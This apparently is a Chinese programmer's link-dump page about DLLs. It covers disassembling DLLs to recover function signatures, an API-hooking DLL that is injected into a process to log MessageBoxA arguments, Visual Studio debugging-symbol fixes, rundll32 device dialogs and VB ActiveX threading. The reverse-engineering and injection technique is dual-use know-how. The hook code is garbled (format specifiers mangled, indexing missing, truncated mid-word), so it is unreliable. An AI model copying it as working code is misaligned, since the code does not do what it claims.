请教各位高手，如何破解Dll文件，从中找出里面的函数和参数的详细情况？ Delphi / VCL组件开发及应用 – CSDN社区 community.csdn.net
http://topic.csdn.net/t/20020429/14/689051.html

教你如何破解Dll文件_蓝色脉动
http://hi.baidu.com/pdw666/blog/item/970d230984d51e85d1581b0c.html

如何破解Dll文件，从中找出里面的函数和参数的详细情况_深海……………….角落
http://hi.baidu.com/wind%5Frain/blog/item/3be1de624703b5dce7113a3f.html
首先需要知道该函数有几个参数，然后再细化参数类型。详细分析过程如下：
     可以通过反汇编来知道接口函数的参数，建议使用W32DSM来分析，也可以直接使用VC来分析，就是麻烦一点。
现在使用W32DSM来具体说明：
1。先打开需要分析的DLL，然后通过菜单功能-》出口来找到需要分析的函数，双击就可以了。它可以直接定位到该函数。
2。看准该函数的入口，一般函数是以以下代码作为入口点的。
push ebp
mov ebp, esp
…
3。然后往下找到该函数的出口，一般函数出口有以下语句。
…
ret xxxx;//其中xxxx就是函数差数的所有的字节数，为4的倍数，xxxx除以4得到的结果
就是参数的个数。
其中参数存放的地方：
ebp+08      //第一个参数
ebp+0C      //第二个参数
ebp+10      //第三个参数
ebp+14      //第四个参数
ebp+18      //第五个参数
ebp+1C      //第六个参数
。。。。
——————————————-
还有一种经常看到的调用方式：
sub esp,xxxx      //开头部分
//函数的内容
。。。
//函数的内容
add esp,xxxx
ret            //结尾部分
其中xxxx/4的结果也是参数的个数。
————————————————-
还有一种调用方式：
有于该函数比较简单，没有参数的压栈过程，
里面的
esp+04就是第一个参数
esp+08就是第二个参数
。。。
esp+xx就是第xx/4个参数
你说看到的xx的最大数除以4后的结果，就是该函数所传递的参数的个数。
———————————————-
到现在位置，你应该能很清楚的看到了传递的参数的个数。至于传递的是些什么内容，还需要进一步的分析。
最方便的办法就是先找到是什么软件在调用此函数，然后通过调试的技术，找到该函数被调用的地方。一般都是PUSH指令
来实现参数的传递的。这时可以看一下具体是什么东西被压入堆栈了，一般来说，如果参数是整数，一看就可以知道了，
如果是字符串的话也是比较简单的，只要到那个地址上面去看一下就可以了。
如果传递的结构的话，没有很方便的办法解决，就是读懂该汇编就可以了。

     另外由于编译器的优化原因，可能有的参数没有我前面说的那么简单。如果在该DLL的某个函数中，有关于API调用的话，
并且调用API的参数整好有一个或多个是该DLL函数的参数的话。那么就可以很容易的知道该DLL函数的参数了。
举例说明：以下汇编代码通过W32DSM得到。
Exported fn(): myTestFunction – Ord:0001h
:10001010 8B442410              mov eax, dword ptr [esp+10]
:10001014 56                  push esi
:10001015 8B74240C              mov esi, dword ptr [esp+0C]
:10001019 0FAF742410            imul esi, dword ptr [esp+10]
:1000101E 85C0                test eax, eax
:10001020 7414                je 10001036
:10001022 8B442418              mov eax, dword ptr [esp+18]
:10001026 8B4C2408              mov ecx, dword ptr [esp+08]
:1000102A 6A63                push 00000000
:1000102C 50                  push eax
:1000102D 51                  push ecx
:1000102E 6A00                push 00000000

* Reference To: USER32.MessageBoxA, Ord:01BEh
                         |
:10001030 FF15B0400010            Call dword ptr [100040B0]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:10001020(C)
|
:10001036 8BC6                mov eax, esi
:10001038 5E                  pop esi
:10001039 C3                  ret
——————————————————-
其中myTestFunction是需要分析的函数，它的里面调用了USER32.MessageBoxA
这个函数计算参数个数的时候要注意了，它不是0X18/4的结果，原因是程序入口
的第二条语句又PUSH了一下，PUSH之前的ESP+10就是第4个参数，就是0×10/4 =4
PUSH之后的语句ESP+ XX，
其中（XX-4）/4才对应于第几个参数。
ESP+0C ==第2个参数
ESP+10 ==第3个参数
ESP+18 ==第5个参数
ESP+08 ==第1个参数
—————————-这样共计算出参数的个数是5个，注意PUSH esi之前与PUSH esi之后，
PUSH一下，ESP的值就减了4，特别需要注意的地方！！！然后看函数的返回处RET指令，
由于看到了RET之前给EAX赋了值，所以可以知道该函数就必定返回了一个值，大家都知道EAX的寄存器
是4个字节的，我们就把它用long来代替好了，现在函数的基本接口已经可以出来了，
long myTestFunction(long p1,long p2,long p3,long p4,long p5);
但是具体的参数类型还需调整，如果该函数里面没有用到任何一个参数的话。那么参数
多少于参数的类型就无所谓了。一般来说这是不太会遇到的。那么，我们怎么去得到该函数的
参数呢？请看下面分析：
       你有没有看到* Reference To: USER32.MessageBoxA, Ord:01BEh这一条语句，
这说明了，在它的内部使用了WINAPI：：MessageBox函数，我们先看一下它的定义：
int MessageBox(
HWND hWnd,          // handle of owner window
LPCTSTR lpText,      // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType          // style of message box
);
它有4个参数。一般我们知道调用API函数的参数是从右往左压入堆栈的，把它的调用过程
翻译为伪ASM就是：
           PUSH uType
           PUSH lpCaption
           PUSH lpText
           PUSH hWnd
           CALL MessageBox
—————————————
我们把这个于上面的语句对应一下，就可以清楚的知道
hWnd        = NULL(0)
lpText      = ecx
lpCaption = eax
uType        = MB_OK(0)
———————————
在往上面看，
原来 EAX 中的值是ESP+18中的内容得到了
     ECX 中的值是ESP+08中的内容得到了

那么到现在为止就可以知道
lpText      = ECX = [ESP+08]      ==第1个参数
lpCaption = EAX = [ESP+18]      ==第5个参数

现在我们可以把该DLL函数接口进一步写成：
long myTestFunction(LPCTSTR lpText,long p2,long p3,long p4,LPCTSTR lpCaption);

至于第3个参数ESP+10，然后找到该参数使用的地方，imul esi, dword ptr [esp+10]有这么一条指令。
因为imul是乘法指令，我们可以肯定是把ESP+10假设位long是不会错的，同理可以知道第2个参数esp+0C
肯定用long也不会错了，至于第4个参数，它只起到了一个测试的作用，
mov eax, dword ptr [esp+10]
test eax, eax
je 10001036
看到这个参数的用法了吗？
把它翻译位C语言就是：
if(p3)
{
     //做je 10001036下面的那些指令
}
return ;
到现在为止可以把第3个参数看成是个指针了吧！就是如果p3为空就直接返回，如果不空就做其它一下事情。

好了，到现在位置可以把正确的接口给列出来了：
long myTestFunction(LPCTSTR lpText,long n1,char *pIsNull,long n2,LPCTSTR lpCaption);

//—————以上内容从http://www.csdn.net/expert/topic/636/636873.xml整理而来——————–

下面使用APIHOOK2.0来分析该参数，相当方便。为了你能更好的理解下面的程序，现举一个MessageBox的例子，
假设本人不知道该函数的参数个数，及参数类型。
     首相获取APIHOOK2.0（网上有的，自己找一下就可以了），解开口，把系统对应的ApiHooks.exe，ApiHooks.dll
放入系统目录中，或者在PATH中能找到的地方。把ApiHooks.lib，ApiHooks.h放入你的工程中，需要自己建立一个，如：MyApiHook,
类型WIN32 Dynamic-Link Library,(空的),然后添加MyApiHook.cpp,该文件中的内容如下：
//——————————–MyApiHook.cpp文件开始—————————————–
// MyApiHook.cpp : Defines the entry point for the DLL application.

//功能：把MyApiHook.dll注入到testdlg.exe的进程中，替换testdlg.exe中所调用的DLL中API
//具体使用如下：
//c:\>apihooks -nq MyApiHook.dll testdlg.exe
//apihooks = apihook.exe 和 apihooks.dll
// -nq      新打开一个程序（testdlg.exe），q不弹出信息
//MyApiHook.dll = By This File Create
//testdlg.exe = 需要替换的程序

#include <stdio.h>

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include “ApiHooks.h”

int (WINAPI *pFunction)(long p1,long p2,long p3, long      p4);
typedef int (WINAPI Function)(long      p1,long p2,long p3, long p4);

int WINAPI MyMessageBoxA(long p1,long p2,long p3, long p4)
{
const nCountParam = 4;
long pp[nCountParam];
pp[0] = p1,pp[1] = p2,pp[2] = p3,pp[3] = p4;

FILE *fp = fopen(“c:\\1.txt”,”w”);
       char szBuf[1024];

sprintf(szBuf, “参数内容的列表，很容易判断是否是字符串，或者为NULL\n”);
fputs(szBuf, fp);

for(long i = 0; i < nCountParam; i++)
{
sprintf(szBuf,”[p*d] = 0×00000000(0)\n”,i);
_try {
     if(pp)
     sprintf(szBuf,”[p*d] = 0x*08x(*d) \t\”*s\”\n”,i,pp,pp,pp);
}_except(1,1)
{
     sprintf(szBuf,”[p*d] = 0x*08x(*d)\n”,i,pp,pp);
}
fputs(szBuf,fp);
}
fclose(fp);

     return(pFunction(p1, p2, p3,p4));
}

exte

OllyDbg v1.10
http://www.ollydbg.de/

调试逆向 【求助】如何在OllyDbg中调试DLL？谢谢 – 看雪软件安全论坛
http://bbs.pediy.com/showthread.php?t=72325

[Debuggers] 【分享】LoadDll.exe – 100%可以停在入口 – 看雪软件安全论坛
http://bbs.pediy.com/showthread.php?t=63485

OllyDbg 2.0
http://www.ollydbg.de/version2.html

请教，怎么用ollydbg修改dll文件？ – 看雪软件安全论坛
http://bbs.pediy.com/showthread.php?t=6333

OLLYDBG的使用（7）_badboy_凤凰博报
http://blog.ifeng.com/article/364602.html

Project Settings for a C++ Debug Configuration
http://msdn.microsoft.com/en-us/library/kcw4dzyf(VS.80).aspx

Debugging an unmanaged DLL whilst importing into C#
http://social.msdn.microsoft.com/forums/en-US/vsdebug/thread/c83c39a5-4775-40ae-a11b-a57742cb217b/

Netf » 存档 » VS2008：“当前不会命中断点.还没有为该文档加载任何符号”
http://netf.cc/?p=11
今天调试gloox时出现：“当前不会命中断点.还没有为该文档加载任何符号”的问题,后来找到解决方法如下:

（1）项目-〉属性-〉配置属性-〉C/C++-〉常规-〉调试信息格式，这里不能为“禁用”。

（2）项目-〉属性-〉配置属性-〉链接器-〉调试-〉生成调试信息，这里设为“是”。

Can’t debug unmanaged code from managed project | Microsoft Connect
http://connect.microsoft.com/VisualStudio/feedback/ViewFeedback.aspx?FeedbackID=351684

Debug Win32 DLL from C# Client – C# / C Sharp answers
http://bytes.com/topic/c-sharp/answers/247896-debug-win32-dll-c-client

The breakpoint will not currently be hit. No symbols have been loaded for this document.
http://geekswithblogs.net/dbutscher/archive/2007/06/26/113472.aspx
The breakpoint will not currently be hit. No symbols have been loaded for this document.

.NET 247
http://www.dotnet247.com/247reference/msgs/46/231361.aspx

http://www.wilsondotnet.com/Tips/ViewPosts.aspx?Thread=6

Debugger problem “The breakpoint will not currently be hit. No symbols have been loaded for this document
http://social.msdn.microsoft.com/Forums/en-US/vbide/thread/557fdedb-268e-48a8-9944-29b2b4e0dec2

VS2005 断点失效解决办法 — Windows Live
http://cid-aff1b2864f025e69.spaces.live.com/blog/cns!AFF1B2864F025E69!163.entry

VS2005 当前不会命中断点，还没有为该文档加载任何符号 – 松鼠的博客 – 博客园
http://www.cnblogs.com/songsu/archive/2009/07/25/1530885.html

vs2008 framework 当前不会命中断点 还没有为该文档加载任何符号 – 大漠一抹云 樊书林 – 博客园
http://www.cnblogs.com/8586/archive/2009/07/30/1534768.html

当前不会命中断点。还没有为该文档加载任何符号 VC/MFC / 基础类 – CSDN社区 community.csdn.net
http://topic.csdn.net/t/20060904/13/4996901.html

“当前不会命中断点. 还没为文档加载任何符号?” 不能设置断点怎么回事 .NET技术 / ASP.NET – CSDN社区 community.csdn.net
http://topic.csdn.net/t/20040129/11/2685219.html

C# 调用非托管的Dll时，调试问题？_C#builder_积木群组
http://group.gimoo.net/review/149059

Netf » 存档 » VS2008：“当前不会命中断点.还没有为该文档加载任何符号”
http://netf.cc/?p=11

VS2008+IE8+.NET3.5SP1出现”当前不会命中断点，还没有为该文档加载任何符号”错误的 – Visual Studio.NET – 拼吾爱程序人生 – 最新编程技术交流社区
http://www.pin5i.com/showtopic-23555.html

【转】VS2005 当前不会命中断点，还没有为该文档加载任何符号_lLoveinBigCity的空间
http://hi.baidu.com/lloveinbigcity/blog/item/49ce9bf2c5a41cc30b46e05c.html
VS2005中设置的断点无效：“当前不会命中断点，还没有为该文档加载任何符号”。折腾了一阵，其实问题主要出在没有生成调试信息。解决方法如下：
（1）项目-〉属性-〉配置属性-〉C/C++-〉常规-〉调试信息格式，这里不能为“禁用”。
（2）项目-〉属性-〉配置属性-〉链接器-〉调试-〉生成调试信息，这里设为“是”。

(3)2005默认的MFC程序是使用动态MFC库(Use   MFC   in   a   Shared   DLL)来链接的 
而动态MFC库使用的是Multi-threaded   DLL   (/MD) 
由于XP对于PE文件格式监测更加严格. 
就会导致部分使用多线程DLL的可执行文件在调用的时候出错 
修改项目属性的编译开关 
Project->Property->configuration   Properties->C/C++->Code   Generation->Runtime   Library 
修改成Multi-threaded   (/MT)

希望这篇文章能帮到和我遇到同样问题的人：）

博客园手机版-vs2008 framework 当前不会命中断点 还没有为该文档加载任何符号
http://m.cnblogs.com/30644/1534768.html

“当前不会命中断点 还没有为该文档加载任何符号”解决方法_无聊的日子
http://hi.baidu.com/liuyonger/blog/item/f58854eefd8dcbfcb3fb956c.html
今天调试时总是出现“当前不会命中断点 还没有为该文档加载任何符号”这样的错误。查了许多，终于找到解决办法。出现这种情况的时候，可以按以下步骤进行处理： 1.打开项目属性页，检查“配置属性”下的“生成”中的细项，其中“生成调试信息”的属性是否设置为true，如果没有，就把它设置为“true”。 2.确认完以上属性后，如果仍然出现该错误，就需要采用如下解决办法了。假设我的项目名称这VPN，这时，可以在以下路径中找到VPN.dll的文件：“C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files\vpn\d3cf95ee\36ebe08d\assembly\dl2\fb705b8f\e8bed8ad_155ec601”，
删除该文件后就可以正常调试了。

How to step into C/C++ DLL from C# application while debugging – Stack Overflow
http://stackoverflow.com/questions/765481/how-to-step-into-c-c-dll-from-c-application-while-debugging

C# 调用非托管的Dll时，调试问题？
http://topic.csdn.net/u/20090929/16/b76767fd-a5ae-415a-ba3f-e0c821101acf.html

vc try catch捕捉所有异常的问题 – startexcel的专栏 – CSDN博客
http://blog.csdn.net/startexcel/archive/2009/05/19/4201585.aspx
catch(…)

c#调用c dll无法找到入口点的问题(非c++ dll)
http://topic.csdn.net/u/20090106/18/f64ee3c8-c04b-4677-ba09-f3744bbd6056.html

VC知识库BLOG-玻璃小屋-做 DLL 时 “__declspec(dllexport)” 和 “.def 文件”定义导出函数的区别（转自MSDN）
http://blog.vckbase.com/zaboli/archive/2006/10/29/22911.html

[转].def文件 – 笔记 – summer – CSDN学生大本营
http://student.csdn.net/space.php?uid=119638&do=blog&id=14382

__declspec(dllexport)与.def文件_griefforyou的程序人生
http://hi.baidu.com/griefforyou/blog/item/6b77962bf0dd33f3e7cd4036.html

CodeProject: C# (.NET) Interface for 7-Zip Archive DLLs. Free source code and programming help
http://www.codeproject.com/KB/DLL/cs_interface_7zip.aspx

7Zip (LZMA) In-Memory Compression with C#
http://www.eggheadcafe.com/tutorials/aspnet/064b41e4-60bc-4d35-9136-368603bcc27a/7zip-lzma-inmemory-com.aspx

How to define arrays in C# Struct
http://social.msdn.microsoft.com/Forums/en-US/csharplanguage/thread/d58f8776-ef36-4aab-b8b2-c4d952b5a1be

请问在C#中如何得到窗口的hWnd-网络编程之家
http://www.nokiamobile.org.cn/post/474666.html

麻烦各位帮个忙啊，关于C#调用C动态库的问题，急啊！！！！！
http://topic.csdn.net/u/20090424/16/2e90f1d9-7881-4b2c-a5b4-3dd4e813fc00.html

Reading a C/C++ data structure in C# from a byte array – Stack Overflow
http://stackoverflow.com/questions/2871/reading-a-c-c-data-structure-in-c-from-a-byte-array

how to declare array of struct – C#
http://www.daniweb.com/forums/thread70429.html

请教c#如何定义DLL的入口参数 – .Net/C# – 中国自学论坛 IT中国论坛 bbs.it86.cc – 站长交流，程序开发，打包源码，工具下载，草根社区，交互设计，用户体验，与中国IT从业者共同成长！
http://bbs.it86.cc/thread-155605-1-1.html

请教c#如何定义DLL的入口参数 – .NET – 编程博客
http://blog.zxbc.cn/html/42/t-54042.html

Structs Array – C# / C Sharp answers
http://bytes.com/topic/c-sharp/answers/248488-structs-array

Debugging DLL Projects
http://msdn.microsoft.com/en-us/library/ms164704.aspx#vxtskdebuggingdllprojectswaystodebugthedll

VC中的数字,CString,string,char*,char[],之间的转化_My Works
http://hi.baidu.com/wit_yd/blog/item/765e3607d882dac57b894793.html

LED显示屏的Dll申明(C#)_笑江湖
http://hi.baidu.com/bj_cjz/blog/item/9674f100a3cdea19738b6578.html

C#调用DLL，出现“尝试读取或写入受保护的内存。这通常指示其他内存已损坏。”_C#开发_积木群组
http://group.gimoo.net/review/27949

Debugging DLL Projects
http://msdn.microsoft.com/en-us/library/ms164704.aspx

How to: Debug from a DLL Project
http://msdn.microsoft.com/en-us/library/605a12zt.aspx

Debugging DLL Projects
http://msdn.microsoft.com/en-us/library/ms164704.aspx

使用C#压缩/解压缩7-zip文件 zip/Unzip file using 7-zip in C# – C#|DOTNET – yaosansi’s Blog
http://www.yaosansi.com/post/1424.html

7Zip (LZMA) In-Memory Compression with C#
http://www.eggheadcafe.com/tutorials/aspnet/064b41e4-60bc-4d35-9136-368603bcc27a/7zip-lzma-inmemory-com.aspx

怎样调用设备管理器中某个硬件的属性对话框 VC/MFC / 硬件/系统 – CSDN社区 community.csdn.net
http://topic.csdn.net/t/20030728/15/2080998.html

CodeProject: Device Property Sheet Dialog. Free source code and programming help
http://www.codeproject.com/KB/system/DevicePropertySheet.aspx?display=Print

如何调用设备属性对话框从应用程序或从命令提示符
http://support.microsoft.com/kb/815320

设备管理器的实现 – ljkong的专栏 – CSDNBlog
http://blog.csdn.net/ljkong/archive/2005/01/17/256742.aspx

关于PDEVICEPROPERTIES的问题 向高手们请教
http://topic.csdn.net/u/20080204/09/3bb0f1fc-5c7f-4af5-b618-778f40b8cd71.html

DeviceProperties_RunDLL Function Prototype
http://msdn.microsoft.com/en-us/library/aa476915.aspx

CodeProject: Device Property Sheet Dialog. Free source code and programming help
http://www.codeproject.com/KB/system/DevicePropertySheet.aspx?fid=83880&df=90&mpp=25&noise=3&sort=Position&view=Quick&fr=26
#define DeviceProperties_RunDLL "DeviceProperties_RunDLLA" typedef void (_stdcall *PDEVICEPROPERTIES)( HWND hwndStub, HINSTANCE hAppInstance, LPSTR lpCmdLine, int nCmdShow );

Windows XP Control Panel, Shortcuts and Control.exe
http://vlaurie.com/computers2/Articles/control.htm

How to Configure Device Manager to Display Detailed Information
http://www.digitalsupporttech.com/kb/304514/
Click Start, click Run, type cmd.exe, and then press ENTER.
2. Type set DEVMGR_SHOW_DETAILS=1, and then press ENTER.
3. Type start devmgmt.msc, and then press ENTER. In Device Manager the properties for a device should now provide a Details tab that contains additional information about the device.

How to change COM port number – CodeGuru Forums
http://www.codeguru.com/forum/showthread.php?t=375882

How to invoke the device Properties dialog box from the application or from a command prompt
http://www.digitalsupporttech.com/mskb/815/815320_How_to_invoke_the_device_Properties_dialog_box_from_the_application_or_from_a_command_prompt.htm
rundll32.exe devmgr.dll,DeviceProperties_RunDLL /DeviceID "PCI\\VEN_8086&DEV_2445 &SUBSYS_010E1028&REV_12\\3&172E68DD&0&FD"

How to change COM port number – technical discussion – developerFusion – the global developer community
http://www.developerfusion.com/forum/thread/34271/

Dx21 – RunDLL32
http://www.dx21.com/coding/libraries/rundll32/Default.aspx?ID=203
You can open the properties dialog of any device attached to your computer and listed in the Device Manager by calling the devmgr.dll, using the DeviceProperties_RunDLL function with the /DeviceID and the registry path of the device.

The registry path of the device starts at HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum and is typically the next three folders down (starting with ACPI, Root, HID, etc.).  The target folder will contain the ClassGUID key.

Example calls:

Rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID ACPI\\PNP0000\\4&11876118&0
Rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID Root\\VSO_IOCD\\0000
Rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID HID\\Vid_046d&Pid_c404\\6&1ee4c77f&0&0000
 

    RUNDLL32.EXE devmgr.dll DeviceProperties_RunDLL /DeviceID &leftsign;Key\\Key\\Key&rightsign;

JSI Tip 5680. How can I add a Details tab to the Windows XP Device Manager Properties dialog?
http://windowsitpro.com/articles/index.cfm?articleid=76984

Failure to Navigate to Device Driver under SYSTEM in Contr..
http://forum.soft32.com/windows/Failure-Navigate-Device-Driver-SYSTEM-Control-Panel-ftopict278299.html

JSI Tip 6490. How do I invoke the device Properties dialog box from the command line?
http://windowsitpro.com/article/articleid/77792/jsi-tip-6490-how-do-i-invoke-the-device-properties-dialog-box-from-the-command-line.html
To invoke the device Properties dialog from the command line, see the following examples:

rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID root\\system\\0000

rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID ACPI_HAL\\PNP0C08\\0

rundll32.exe devmgr.dll DeviceProperties_RunDLL /DeviceID "PCI\\VEN_8086&DEV_2445 &SUBSYS_010E1028&REV_12\\3&172E68DD&0&FD"

CodeProject: Changing your Windows audio device programmatically using VC++. Free source code and programming help
http://www.codeproject.com/KB/system/AudioConfigurationManager.aspx

QPropertyEditor Qt-Apps.org
http://www.qt-apps.org/content/show.php/QPropertyEditor?content=68684
This small library is used to be a lightweight method to allow the graphical editing of properties defined via the Q_PROPERTY macro. It can be easily extended for custom datatypes.

In the zip archiv a Sample Application is included that contains a custom property for a vector with three floating point values.

Feedback is welcome!

如何使用QT生成动态库 – 动态库相关资料 – HelloFHunter 分享的美
http://blog.chinaunix.net/u2/67893/showart_1132476.html
 

这里注意二点关键的:

1. 要在Makefile文件的LIB栏加上"-lzzq" 这里的zzq为so文件的文件名

2. 将生成的so文件 "cp so文件目录 /lib " 目录中

3. 接下来make 就可以了

太简单了,网上搞得太复杂了!

如何使用QT生成动态库 – 动态库相关资料 – HelloFHunter 分享的美
http://blog.chinaunix.net/u2/67893/showart_1132476.html
在pro文件中加上：
    TEMPLATE    = lib
如果你想保证在unix下和windows下都能够通用那需要在某个头文件中：
#if defined(WIN32) &line;&line; defined(WIN64) &line;&line; defined(_WINDOWS)
    #ifdef  XXXXX_DLL
        #define XXX_EXPORT __declspec(dllexport)
    #else
        #define XXX_EXPORT __declspec(dllimport)
    #endif
#else
    #define XXX_EXPORT
#endif
然后按class XXX_EXPORT  CLASSNAME 的格式去进行想导出的类声明。
最后在pro文件中加入：
DEFINES    += XXXXX_DLL
//////
按以上的思路应该可以解决问题，最好参考qmake manual。

#ifndef MYLIB_H
#define MYLIB_H

#include <stdio.h>
#ifdef WIN32
#ifdef MYLIBDLL
#define MYLIBAPI __declspec(dllexport)
#else
#define MYLIBAPI __declspec(dllimport)
#endif
#else
#define MYLIBAPI
#endif

class MYLIBAPI  mylibclass &leftsign;
public:
 mylibclass()&leftsign;&rightsign;;
 ~mylibclass()&leftsign;&rightsign;;
public :
 void func()&leftsign;printf("\\n mylibclass api \\n");&rightsign;
 void func2();

&rightsign;;

#endif

标签：dll

20080328 多线程客户 ActiveXDLL
http://www.yippeesoft.com

多线程客户 ActiveXDLL 位于
• 内部 MSVBVM60.DLL 访问冲突。
• 客户端进入死锁状态。
如果 VisualBasicActiveXDLL 位于多线程环境, 例如, IIS、 MTS 或多线程客户, 并且不 保留入内存 选项已启用可能看到下列两种症状。 要启用此选项, 请按照下列步骤：
1. 从 项目 菜单, 选择 项目属性 。
2. 在 常规 选项卡, 确保线程模型是单元线程, 然后选中复选框 无人参与执行 和 保留入内存 * 。
3. 保存项目并编译该 DLL。
* 注意 无人参与执行 选项是如果项目包含任何用户界面元素, 如窗体或控件不可用。 如果未选中 无人参与执行 保留入内存 选项无效。

注意 之前到 Service Pack 3 for Visual Studio 6.0, 它是能与启用内存中保留过程关机期间获取一个 AV。 这已修复新 Visual Studio 6.0 ServicePack 中：
http://msdn2.microsoft.com/en-us/vstudio/aa718364.aspx\’ (http://msdn2.microsoft.com/en-us/vstudio/aa718364.aspx)

如果 UserControl 或 ActiveXDLL 项目包含 API 声明、 期间关闭进程 / 线程可能遇到死锁或对象创建， 即使 无人参与执行 复选框后已选择对 ActiveXDLL 而言。 若要解决办法代替中 Declare 问题, 请使用类型库 VisualBasic。 请有关如何使用类型库, 上的其他信息单击 % 2 下面文章编号以查看 Microsoft 知识库文章 % 2:
189133 (http://support.microsoft.com/kb/189133/EN-US/) HOWTO： VB 更可用类型库生成 C DLL

回到顶端
ActiveXEXE 访问由多线程客户或 – threaded multi 单个或多个客户端
运行时错误 \’ 7 \’ 跟磁盘操作错误的内存不足， 有时：。
\’ 430 \’ 运行时错误： 类不支持自动化或不支持预期接口。
\’ 424 \’ 运行时错误： 必需对象。
运行时错误 \’ -2147023170 (800706be) \’： 自动化错误。 远程过程调用失败。
运行时错误 \’ -2147287010 (8003001e) \’： 自动化错误。 这是 ErrLook " 执行读取操作 A 磁盘时出错 " 基于。
即使 Class 1 的 Instancing 属性标记 MultiUse 创建其他服务器进程 （ThreadTest.EXE)。
出现可能看到如果您有使用大于一个 (1), 和多线程客户或多个 – threaded multi 单个或客户快速创建和销毁对象内部服务器线程池一个 ActiveXEXE 服务器上述错误信息。 若要解决此问题, 可本地服务器中创建一个空类并有下面 " 更多信息 " 部分中显示时保持对它引用客户。

回到顶端
状态
此行为由 design.In Visual Studio 6 Service Pack 5, 如果项目包含任何公用类具有 MTSTransactionMode 将为任何非 0 、 无人参与执行 选项和 保留入内存 选项是自动选中。

回到顶端
更多信息
重现行为步骤
答：: 创建服务器
1. 创建一个 ActiveXEXE 项目并重命名 ThreadTest 。
2. 从 项目 菜单上, 选择 项目属性 ， 在 常规 选项卡, 选择 线程池 是两 (2)。
3. 以下代码添加到默认类 （Class 1）：

Private strClassName As String
Public Property Let ClassName(ByVal vData As String)
   strClassName = vData
End Property
Public Property Get ClassName() As String
   ClassName = strClassName
End Property
     

4. 保存并编译项目 (ThreadTest.EXE)。
客户 B：: 创建和测试
1. 启动一个标准 EXE 项目并重命名为 客户端 。
2. 向默认窗体 (Form 1) 添加命令按钮和文本框。
3. 以下代码添加到 Form 1：

Private Sub Command1_Click()
   Dim i As Long, j As Long
   Dim o As Object
   j = Val(Text1.Text)
   For i = 1 To j
      DoEvents
      Set o = CreateObject("ThreadTest.Class1")
      o.ClassName = i
      Me.Caption = o.ClassName
      Set o = Nothing
   Next
End Sub
Private Sub Form_Load()
   Text1.Text = 1000
   Command1.Caption = "Start"
End Sub
     

4. 编译项目 (Client.EXE)。
5. 开始三个或多个 Client.EXE 实例并按每个表单上 开始 按钮。 请注意， 您看到一个或多个上述错误消息。
C: 实现解决办法
1. 打开 ThreadTest 项目。
2. 添加另一个类模块 （Class 2)， 没有代码。
3. 保存并 re-compile (ThreadTest.EXE) 项目。
4. 打开客户端项目。
5. 使用以下替换 Form 1 中代码：

Private p As Object
Private Sub Command1_Click()
   Dim i As Long, j As Long
   Dim o As Object
   j = Val(Text1.Text)
   For i = 1 To j
      DoEvents
      Set o = CreateObject("ThreadTest.Class1")
      o.ClassName = i
      Me.Caption = o.ClassName
      Set o = Nothing
   Next
End Sub
Private Sub Form_Load()
   Text1.Text = 1000
   Command1.Caption = "Start"  
   Set p = CreateObject("ThreadTest.Class2")
End Sub
Private Sub Form_Unload(Cancel As Integer)
   Set p = Nothing
End Sub
     

6. 保存并 re-compile (Client.EXE) 项目。
7. 运行三个或多个 Client.EXE 实例并按每个表单上 开始 按钮。 请注意， 您应该看到任何错误消息。
解决办法 C 属于 " 更多信息 " 部分中描述 ActiveXEXE 使用大于一个线程池由多客户通过 DCOM, 访问时不起作用。 因此, Visual Basic 6.0 ActiveX EXE 服务器是不适合 DCOM 服务器和多客户快速创建和销毁对象。如果服务器应用程序需要处理此方案, 是强烈建议您使用 ActiveXDLL MTS 中。 当设计 ActiveX DLL 来将位于 MTS, 无人参与执行 和 保留入内存 复选框都选中， 应确保。 这些复选框， 当选择 属性 , 并选择 常规 选项卡位于 项目 菜单,。

当您打算使用 MTS 或 COM+ 下 ActiveX 组件的类不使用 GlobalMultiUse Instancing 属性 接口 GlobalMultiUse 对象缓存中并不释放直到线程终止每个线程基于表。 因此, 不同上下文中调用带有 （尽管在同一线程）上， 它与 RPC_E_WRONG_THREAD 失败如果。 用于在 MTS 和 COM+, 组件应当设计以某种方式， 对象是无状态类。

复现行为的步骤
1. 创建 VisualBasic ActiveX DLL 项目称为 " ByRefProj "。
2. 添加类模块称为 " ByRefObj "。
3. 实现下列方法：

Public Sub ByRefMethod( ByRef strVal as String )
  strVal = "This variable is passed by Reference"
End Sub

4. 创建 ASP 页调用此方法：

<%
  Dim objTest, strByRefVal
  Set objTest = Server.CreateObject("ByRefProj.ByRefObj")
  objTest.ByRefMethod strByRefVal
%>

5. 运行 ASP。 发生下列错误:
MicrosoftVBScript 运行时错误 \’ 800a000d \’
类型匹配 \’ ByRefMethod \’:
要纠正此行为：

ByRefMethod 方法实现如下更改：

Public Sub ByRefMethod( ByRef strVal as Variant )
  strVal = "This variable is passed by Reference"
End Sub
    

20080301 vb 多线程 DLL 线程
http://www.yippeesoft.com

一个VB程序，需要动态创建控件，然后传递给DLL使用
DLL阻塞进程，因此找了一些资料
最后还是得DLL创建线程使用

在DLL中能产生线程函数。 
      UINT   Computer(LPVOID   pParam) 
  &leftsign; 
      AfxMessageBox("Thread   is   running   :")   ; 
      return   0   ; 
  &rightsign; 
  CEx25App   theApp; 
  extern   "C"   __declspec(dllexport)   void   Demo() 
  &leftsign; 
      ::AfxBeginThread(Computer,NULL,THREAD_PRIORITY_NORMAL)   ; 
    &rightsign; 
  然后Build这个DLL。  

声明DEMO
Private Declare Function Demo Lib " dll.dll" _
() As Long

http://topic.csdn.net/t/20010828/14/259698.html
请问如何在DLL的一个输出函数里用CreateThread()创建线程？注意方面？

Visual Basic Concepts
Apartment-Model Threading in Visual Basic
http://msdn2.microsoft.com/en-us/library/aa261361.aspx

http://www.vbaccelerator.com/home/VB/Code/Libraries/Threading/Multi-threading_using_classes_in_ActiveX_EXEs/article.asp
Multi-Threaded VB Using ActiveX EXEs

http://www.microsoft.com/china/msdn/archives/library/techart/complus_implementing.asp
在 Visual Basic 中实现业务层服务器

http://msdn2.microsoft.com/zh-cn/library/fe4t35h6.aspx
适用于 Visual Basic 6.0 用户的组件创作

B运行错误430号
